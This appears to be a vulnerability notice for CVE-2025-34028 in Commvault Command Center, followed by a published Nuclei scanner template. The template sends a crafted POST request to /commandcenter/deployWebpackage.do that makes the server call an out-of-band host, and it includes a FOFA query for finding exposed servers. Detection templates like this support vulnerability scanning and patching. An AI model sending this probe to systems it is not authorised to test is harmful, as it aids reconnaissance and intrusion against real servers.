A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.
PoC代码[已公开]
id: CVE-2025-34028
info:
name: Commvault - SSRF via /commandcenter/deployWebpackage.do
author: DhiyaneshDk,abhishekrautela
severity: critical
description: |
A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution. This issue affects Command Center Innovation Release: 11.38.
reference:
- https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
- https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/
- https://nvd.nist.gov/vuln/detail/CVE-2025-34028
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-34028
cwe-id: CWE-22
epss-score: 0.73577
epss-percentile: 0.98769
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="1209838013"
tags: cve,cve2025,ssrf,oast,commvault,kev,vkev
variables:
string: "{{to_lower(rand_base(5))}}"
http:
- raw:
- |
POST /commandcenter/deployWebpackage.do HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
commcellName={{interactsh-url}}&servicePack={{string}}&version=x
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
- 'status_code == 900'
condition: and
# digest: 4a0a00473045022079d8ec05bab0cd8d9db45c4b8e72cd3db7ea50727934a90a6390a2ae133e873b022100bffc45ca6e7549760e05137b9be4fcad83b97ecc4abd4a2c78fa738d2d24b1af:922c64590222798bb761d5b6d8e72950